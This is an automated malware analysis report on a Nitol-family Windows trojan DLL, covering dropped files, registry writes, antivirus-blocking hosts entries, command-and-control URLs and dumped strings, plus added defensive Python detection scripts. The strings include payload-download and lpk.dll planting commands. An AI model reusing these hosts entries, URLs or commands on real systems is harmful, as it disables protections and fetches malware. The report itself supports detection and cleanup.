Detections: HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.6278340 (B) (Emsisoft), Trojan.Generic.6278340 (AdAware), DDoS.Win32.Nitol.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericDownloader.YR, DDoSNitol.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ef50bb6aed4044c5b61d6642583ab769
SHA1: 41dd818e62e58081faa3f4b849874e6904bc3bb1
SHA256: 373190468904a0ea82cc76a7ce181b705942ae3785dd3107bbbfdf4e43181ee2
SSDeep: 768:MVCub7ChDTieMB9IqaoWuHnhmqUCai 4USlayHDojY9P7:927YDGl3Iq7WuHEqUExlayH2mj
Size: 50688 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2010-09-14 11:27:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
taskkill.exe:1228
mhrma.exe:1976
lssaa.exe:1472
regsvr32.exe:560
hrl1.tmp:1676
The Trojan injects its code into the following process(es):
QQExtrenal.exe:1300
svchost.exe:432
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process mhrma.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jarinet\QQExtrenal.exe (28 bytes)
The process regsvr32.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)
The process QQExtrenal.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
%WinDir%\inf\lssaa.exe (45 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
%System%\drivers\etc\hosts (898 bytes)
The process hrl1.tmp:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\iigmiy.exe (36 bytes)
Registry activity
The process taskkill.exe:1228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 DB 30 AE A5 DB 97 8D 99 E7 79 A3 DC B8 60 EC"
(The RNG\Seed value is rewritten by the Windows CryptoAPI whenever a process draws random bytes; every process listed below touches it. It is a side effect of the process running, not a configuration change made by the malware, and is not useful as an indicator.)
The process mhrma.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 0F 4D 4A 83 33 98 BD 1D A0 94 83 BD 6D DB F5"
The process lssaa.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 51 E8 3A C0 50 D7 AF 2E 6C AA 0E 1C 21 B1 85"
The process regsvr32.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA EB 2F DE F5 35 81 8D EF 07 3A 9D E1 F4 AB 9D"
The process QQExtrenal.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 BD 70 FB 9C CA 4E E1 C1 A5 7C DE 25 EE 8F 41"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The Trojan sets IE security-zone options under the .DEFAULT profile so that all local (intranet) sites not listed in other zones are placed in the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
so that all sites that bypass the proxy server are placed in the Intranet Zone:
"ProxyBypass" = "1"
and so that all network paths (UNCs) are placed in the Intranet Zone:
"UNCAsIntranet" = "1"
These three values, like the Shell Folders and cache-path writes listed above, are consistent with WinInet initialising Internet settings for a profile that has none; they land under HKU\.DEFAULT because QQExtrenal.exe is running under the LocalService profile (note the LocalService cache paths). Treat them as context for the HTTP downloads that follow, not as a standalone indicator.
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process hrl1.tmp:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 68 F3 49 6B FF 05 2B 7D 3A 1B 51 89 B7 28 66"
[HKLM\System\CurrentControlSet\Services\Nationalreo]
"Description" = "Providesfht a domain server for NI security."
Dropped PE files
MD5 | File path |
---|---|
ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\All Users\Application Data\Adobe\Reader\9.3\ARM\lpk.dll |
2dfbee5818c733bfbceb52997356c3a6 | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\207023[1].exe |
547bca30fa2f34ae928845958e2dc73b | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe |
ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll |
ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll |
ca4f235951413d179b839ab4b772ef63 | c:\Perl\bin\lpk.dll |
2dfbee5818c733bfbceb52997356c3a6 | c:\WINDOWS\Temp\mhrma.exe |
ca4f235951413d179b839ab4b772ef63 | c:\WINDOWS\system32\hra33.dll |
a0ead738be12651816b2d02ff16591ae | c:\WINDOWS\system32\iigmiy.exe |
2dfbee5818c733bfbceb52997356c3a6 | c:\WINDOWS\system32\jarinet\QQExtrenal.exe |
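The table above shows one file (MD5 ca4f235951413d179b839ab4b772ef63) dropped as lpk.dll beside Perl and Adobe Reader executables and again as %System%\hra33.dll, which matches the "hra%u.dll" and rar.exe command strings in the svchost.exe dump further down. On Windows XP, lpk.dll is not a KnownDLL, so a copy placed in an application's directory is loaded by every GUI executable in that directory ahead of %System%\lpk.dll. The following is an added example, not code from the report or from Lavasoft: it walks a volume, flags every lpk.dll outside the system directories and groups the hits by hash so identical planted copies stand out. The sample tree built by build_demo_tree() and the SYSTEM_DIRS list are constructed assumptions for the demo.

```python
"""Added example: find lpk.dll copies planted outside the system directory
(DLL search-order hijacking). Sample tree and SYSTEM_DIRS are assumptions."""
import hashlib
import os
import tempfile

DLL_NAME = "lpk.dll"
# Locations (relative to the scanned root, lower-case, backslash-separated)
# where lpk.dll legitimately lives. Assumption: adjust for the volume layout.
SYSTEM_DIRS = ("windows\\system32", "windows\\syswow64")


def file_md5(path):
    """MD5 of a file, to line up with the hashes used in the report's table."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_planted_lpk(root):
    """Walk root and return {md5: [paths]} for every lpk.dll that is not under
    a system directory. Several paths under one hash mean the same DLL was
    dropped into several application folders, as in the table above."""
    planted = {}
    for dirpath, _dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root).lower().replace("/", "\\")
        if rel.startswith(SYSTEM_DIRS):
            continue
        for name in files:
            if name.lower() == DLL_NAME:
                full = os.path.join(dirpath, name)
                planted.setdefault(file_md5(full), []).append(full)
    return {h: sorted(paths) for h, paths in planted.items()}


def build_demo_tree(base):
    """Constructed sample: one legitimate lpk.dll under Windows\\System32 and
    two identical planted copies in application folders taken from the report."""
    system32 = os.path.join(base, "Windows", "System32")
    app_dirs = [
        os.path.join(base, "Perl", "bin"),
        os.path.join(base, "Documents and Settings", "All Users",
                     "Application Data", "Adobe", "Reader", "9.3", "ARM"),
    ]
    for d in [system32] + app_dirs:
        os.makedirs(d, exist_ok=True)
    with open(os.path.join(system32, DLL_NAME), "wb") as fh:
        fh.write(b"MZ legitimate language pack (constructed bytes)")
    for d in app_dirs:
        with open(os.path.join(d, DLL_NAME), "wb") as fh:
            fh.write(b"MZ planted copy (constructed bytes)")
    return app_dirs


def scan_demo():
    """Build the sample tree in a temp dir, scan it and return the findings
    with paths made relative to the root so they are stable across runs."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        findings = find_planted_lpk(tmp)
        return {h: [os.path.relpath(p, tmp) for p in paths]
                for h, paths in findings.items()}


if __name__ == "__main__":
    for digest, paths in scan_demo().items():
        print(digest)
        for p in paths:
            print("  ", p)
```

Run it against a mounted image root instead of the temp tree to triage a real host; any lpk.dll that is not in the system directories, or whose hash differs from the system copy, deserves a look, and a hash that appears in more than one application folder is the pattern this sample leaves behind.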
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses before DNS is consulted. The modified file is 402 bytes in size. The following entries are added to the hosts file; each points a security-vendor site at the loopback address so that updates and downloads from that vendor fail:
IP | Host |
---|---|
127.0.0.1 | www.360.cn |
127.0.0.1 | www.kaspersky.com.cn |
127.0.0.1 | www.ijinshan.com |
127.0.0.1 | www.rising.com.cn |
127.0.0.1 | cn.trendmicro.com |
127.0.0.1 | www.symantec.com |
127.0.0.1 | sd.360.cn |
127.0.0.1 | www.eset.com.cn |
127.0.0.1 | www.avast.com |
127.0.0.1 | www.micropoint.com.cn |
127.0.0.1 | www.avira.com |
127.0.0.1 | www.avg.com |
127.0.0.1 | www.jiangmin.com |
127.0.0.1 | www.ggsafe.com |
127.0.0.1 | guanjia.qq.com |
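A hosts-file check for this pattern is short enough to keep in a triage kit. The following is an added example, not code from the report or from Lavasoft: it parses a Windows hosts file, flags entries that pin security-vendor names to a loopback or unspecified address, and produces a cleaned copy that drops only the flagged lines, so the default "127.0.0.1 localhost" entry and any legitimate mappings survive. SAMPLE_HOSTS is constructed from entries listed above plus one benign line; VENDOR_KEYWORDS is an assumption drawn from the table and will need extending for your environment.

```python
"""Added example: flag and remove hosts-file entries that sinkhole security
vendors. SAMPLE_HOSTS and VENDOR_KEYWORDS are constructed assumptions."""
import ipaddress

# Substrings of vendor domains seen in the report. Substring matching is a
# heuristic: "avg" also matches unrelated names, so review hits before acting.
VENDOR_KEYWORDS = ("360.cn", "kaspersky", "ijinshan", "rising", "trendmicro",
                   "symantec", "eset", "avast", "micropoint", "avira", "avg",
                   "jiangmin", "ggsafe", "guanjia", "kaba")

SAMPLE_HOSTS = """# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#      102.54.94.97     rhino.acme.com          # source server
127.0.0.1       localhost
127.0.0.1 www.360.cn
127.0.0.1 www.kaspersky.com.cn
0.0.0.0 guanjia.qq.com
10.0.0.5 intranet.example.local
"""


def parse_hosts(text):
    """Yield (line_number, ip, hostname) for every mapping; comments skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line, not a mapping
        for host in fields[1:]:
            yield lineno, ip, host.lower()


def find_sinkholed_vendors(text):
    """Return [(line_number, ip, host)] for vendor names sent to 127.x, ::1 or 0.0.0.0."""
    hits = []
    for lineno, ip, host in parse_hosts(text):
        if host == "localhost":
            continue
        sinkholed = ip.is_loopback or ip.is_unspecified
        if sinkholed and any(k in host for k in VENDOR_KEYWORDS):
            hits.append((lineno, str(ip), host))
    return hits


def clean_hosts(text):
    """Drop only the flagged lines; comments and legitimate mappings survive,
    so the default '127.0.0.1 localhost' entry is kept rather than rewritten."""
    bad_lines = {lineno for lineno, _ip, _host in find_sinkholed_vendors(text)}
    kept = [line for n, line in enumerate(text.splitlines(), 1) if n not in bad_lines]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for lineno, ip, host in find_sinkholed_vendors(SAMPLE_HOSTS):
        print(f"line {lineno}: {host} -> {ip}")
    print(clean_hosts(SAMPLE_HOSTS))
```

To use it on a live system, read %System%\drivers\etc\hosts, review the hits, then write the output of clean_hosts() back; this is the same end state as the "Restore the original content of the HOSTS file" step in the removal section, without discarding entries an administrator added deliberately.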
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal
- Terminate the malicious process(es):
taskkill.exe:1228
mhrma.exe:1976
lssaa.exe:1472
regsvr32.exe:560
hrl1.tmp:1676
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\jarinet\QQExtrenal.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
%WinDir%\inf\lssaa.exe (45 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
%System%\drivers\etc\hosts (898 bytes)
%System%\iigmiy.exe (36 bytes)
- Also remove the files listed under "Dropped PE files" that this list omits: every planted lpk.dll copy, %System%\hra33.dll, %WinDir%\Temp\mhrma.exe and the cached 207023[1].exe, and delete the Nationalreo service key (HKLM\System\CurrentControlSet\Services\Nationalreo) registered by hrl1.tmp.
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files.
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 4853 | 5120 | 4.22182 | 56a4660d1dce36d81c7173fe2bdaa8da |
.rdata | 12288 | 2617 | 3072 | 3.09371 | c375b8bfb64c0a66ffa8284e48d9e40a |
.data | 16384 | 1500 | 512 | 0.112976 | 0b2e7741e0c0fc65af1542e370d89f53 |
.CRT | 20480 | 4 | 512 | 0.042395 | dcbbf4e61fb806ed312aaf3c094dc153 |
.rsrc | 24576 | 39228 | 39424 | 4.02044 | 95b22bf3bdd3071cfc5a4f787b88c49f |
.reloc | 65536 | 700 | 1024 | 2.971 | 9c7cbab195c7f30b2d2a7924e5a5dc92 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://192.240.107.44/toopu2.png | |
www.mojimojimojimoji.com | 198.15.148.34 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /toopu2.png HTTP/1.1
Accept: */*
Referer:
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Host: 192.240.107.44
Connection: Keep-Alive
Cookie:
HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 28 Apr 2016 03:24:07 GMT
Accept-Ranges: bytes
ETag: "9c2a476cfda0d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 30 May 2016 22:15:32 GMT
Content-Length: 286377
.PNG........IHDR...9...9.......s.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:967CD4C7D4E611E39675E1BAB4918499" xmpMM:DocumentID="xmp.did:967CD4C8D4E611E39675E1BAB4918499"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:967CD4C5D4E611E39675E1BAB4918499" stRef:documentID="xmp.did:967CD4C6D4E611E39675E1BAB4918499"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>uU.~....PLTE........e..$.....W..l..}ygH.....!....X............z...vkW.........|uk......................j;...........^.......x......#.wF.kE.{&..G........1.v5....z......T..K..*....rY....h&...UG...U.................~........7..J....n.lF...C....xd..2..{..:yc<..(.k(.v...~.t.....l.lM.wY'...........,.}......@........C..Y.......qD..q.....N.....~...wR.R;.zS............y..93*.....y.....|c.u.lT*...f[I........j....{s..]..X...........B.....&.....j..M..........z^.qQZA..~......9...........T.............v`......kX9.....C...mg^.....5.z...xzo\...yI......St^9.~...J.g............{............^UF..........^!....
<<< skipped >>>
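The request above is the one lssaa.exe builds from the format strings visible in its dump further down (GET %s / Referer: %s / Accept-Language: %s / User-Agent: %s / Host: %s / Cookie: %s). Several traits make it easy to recognise on the wire: the User-Agent is a fixed string that claims Windows NT 5.2 although the sandbox is XP SP3 (NT 5.1), the Referer and Cookie headers are emitted empty because the template always prints them, the Host header is a bare IP address, and the template's header order is preserved. The following is an added example, not code from the report or from Lavasoft: a scorer that parses a raw HTTP request and returns which of those indicators matched. SAMPLE_REQUEST is reconstructed from the Traffic section; BENIGN_REQUEST is constructed for contrast.

```python
"""Added example: score a raw HTTP request against the lssaa.exe request
fingerprint seen in the report. SAMPLE_REQUEST is rebuilt from the capture;
BENIGN_REQUEST is constructed."""
import ipaddress

FLOOD_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; "
            ".NET CLR 1.1.4322; .NET CLR 2.0.50215)")
# Relative order of the headers the lssaa.exe template emits.
TEMPLATE_ORDER = ("referer", "accept-language", "user-agent", "host", "cookie")

SAMPLE_REQUEST = (
    "GET /toopu2.png HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Referer:\r\n"
    "Accept-Language: zh-cn\r\n"
    "UA-CPU: x86\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: " + FLOOD_UA + "\r\n"
    "Host: 192.240.107.44\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie:\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/120.0\r\n"
    "Accept: text/html\r\n"
    "Accept-Language: en-US\r\n"
    "Cookie: session=abc\r\n"
    "\r\n"
)


def parse_request(raw):
    """Return (request_line, [(name, value), ...]) preserving header order;
    header names are lower-cased, values stripped."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _sep, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def score_request(raw):
    """Return the list of matched indicators; an empty list means no match."""
    _request_line, headers = parse_request(raw)
    by_name = dict(headers)
    reasons = []
    if by_name.get("user-agent") == FLOOD_UA:
        reasons.append("user-agent equals the lssaa.exe hard-coded string")
    for name in ("referer", "cookie"):
        if name in by_name and by_name[name] == "":
            reasons.append(f"{name} header present but empty")
    host = by_name.get("host", "").rsplit(":", 1)[0]
    try:
        ipaddress.ip_address(host)
        reasons.append("host header is a bare IP address")
    except ValueError:
        pass
    # Header order: all template headers present, in the order the template prints them.
    seen = [name for name, _value in headers if name in TEMPLATE_ORDER]
    if seen == list(TEMPLATE_ORDER):
        reasons.append("header order matches the lssaa.exe template")
    return reasons


if __name__ == "__main__":
    print("sample :", score_request(SAMPLE_REQUEST))
    print("benign :", score_request(BENIGN_REQUEST))
```

None of the indicators is conclusive alone (real IE6 on Server 2003 sends the same User-Agent, and bare-IP hosts are common in automation), so alert on the combination rather than on any single reason; the empty Referer and Cookie headers are the most specific to this template.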
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
regsvr32.exe_560:
.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
svchost.exe_432:
.text
`.rdata
@.data
.rsrc
ADVAPI32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
SHLWAPI.dll
ShellExecuteA
SHELL32.dll
WS2_32.dll
MSVCRT.dll
_acmdln
WinExec
KERNEL32.dll
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/testq.html
VVV.mojimojimojimoji.com:8088
%u.%u.%u.%u
hra%u.dll
iexplore.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
urlmon.dll
%c%c%c%c%c.exe
PlusCtrl.dll
%c%c%c%c%c%c.exe
%u MB
%u MHz
Windows NT
Windows 7
Windows 2008
Windows Vista
Windows 2003
Windows XP
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
#0%s!
%s/%s
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
192.168.1.244
svchost.exe
ntdll.dll
@.reloc
lpk.dll
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
svchost.exe_432_rwx_00400000_0000C000:
(Same string set as the svchost.exe_432 dump above.)
QQExtrenal.exe_1300:
.text
`.data
.rsrc
MSVBVM60.DLL
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 kaba365.com
xxD.Downloader
VB5!6&vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
RegCreateKeyA
RegCloseKey
VBA6.DLL
c:\windows\system32\jarinet
cmd /c taskkill /f /im QQExtrenal.exe
hXXp://
%System%\drivers\etc\hosts
Microsoft.XMLHTTP
Adodb.Stream
c:\windows\inf\
Software\Microsoft\Windows\CurrentVersion\Run
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe "
.exe"
xxDown.exe
lssaa.exe_1472:
.text
`.rdata
@.data
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ADVAPI32.dll
WS2_32.dll
GetCPInfo
.rsrc
GET %s HTTP/1.1
Referer: %s
Accept-Language: %s
User-Agent: %s
Host: %s
Cookie: %s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
hXXp://192.240.107.44/toopu2.png
c:\windows\inf\lssaa.exe
comine.exe_212:
.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
psapi.dll
kernel32.dll
NTDLL.DLL
shell32.dll
SHFileOperationA
ShellExecuteA
VBA6.DLL
1.vbp
hXXp://VVV.hao12338.com/?index
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
%Program Files%\Windows Media Player
%Program Files%
explorer.exe
WScript.Shell
